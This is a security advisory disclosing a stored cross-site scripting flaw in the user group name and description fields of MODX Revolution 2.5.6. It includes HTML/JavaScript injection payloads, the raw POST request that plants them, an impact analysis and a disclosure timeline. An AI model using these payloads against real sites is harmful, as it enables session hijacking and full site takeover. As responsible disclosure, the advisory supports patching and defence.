Information
| Name: | MODX Revolution 2.5.6 |
|---|---|
| Software: | MODX CMS |
| Homepage: | https://modx.com |
| Vulnerability: | stored WCI |
| Prerequisites: | attacker needs to be authenticated and with permission to edit roles |
| Severity: | medium |
| CVE: | CVE-2017-1000223 |
Description
Several stored WCI (a.k.a XSS) were discovered in the latest MODX Revolution code. Authenticated user with permissions to edit roles can use it to execute malicious JavaScript and possibly take control over victims' accounts.
Proof of Concept
The functionality is located at:
(settings) -> Access Control Lists -> User Group & Users -> New User Group -> Name
- Add new user group: http://victim.site/manager/?a=security/permission
- Edit user group: http://victim.site/manager/?a=security/usergroup/update&id=4
Set the name of the group to:
<h1 style=color:red>Malicious</h1><img src=x onerror=alert(1)>
Set the description of the group to:
<h1 style=color:red>Malicious group</h1><img src=x onerror=alert(2)>
Following request is made after saving the form:
POST /connectors/index.php HTTP/1.1
Host: victim.site
modAuth: modx58dd6b78abecd0.81702322_158e1f669c75121.62443671
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 303
Cookie: PHPSESSID=mq0kub9tiu3dv7l00ec472n9v6
Connection: close
action=security%2Fgroup%2Fcreate&HTTP_MODAUTH=modx58dd6b78abecd0.81702322_158e1f669c75121.62443671&parent=0&name=%3Ch1%20style%3Dcolor%3Ared%3EMalicious%3C%2Fh1%3E&description=%3Ch1%20style%3Dcolor%3Ared%3EMalicious%20group%3C%2Fh1%3E&aw_users=&aw_resource_groups=&aw_contexts=web&policy=&aw_categories=
The payload is executed when the victim visits various pages where groups are rendered on the page:
- http://victim.site/manager/?a=security/permission
- http://victim.site/manager/?a=security/usergroup/update&id=3
- Manage Users -> (update user) -> Access Permissions -> Add User to Group -> ("Add User to Group" modal opens) -> User Group
Impact
Taking control over site's administrator leads to full compromise since the administrator can execute PHP by installing a plugin on the site. Attacker with permissions to edit user groups can use the functionality to execute malicious JavaScript on the victim's browsers. This can be used to take control over other users' sessions, which in turn leads to full site compromise if code is executed by the administrator.
Conclusion
Authenticated attacker with permissions to edit user groups can take control over administrator session and possibly execute PHP code on the server.
Following release has been published mitigating the issue: https://modx.com/blog/modx-revolution-2.5.7
Timeline
- 01.04.2017 | me > developer | vulnerability discovered
- 03.04.2017 | me > developer | sent the report to the developers
- 13.04.2017 | developer > me | acknowledged the finding
- 21.04.2017 | developer > public | new version released
- 29.04.2017 | me > developer | reported issues with the fix; no response
- 22.08.2017 | DWF > developer | CVE assigned
- 31.08.2017 | me > public | full disclosure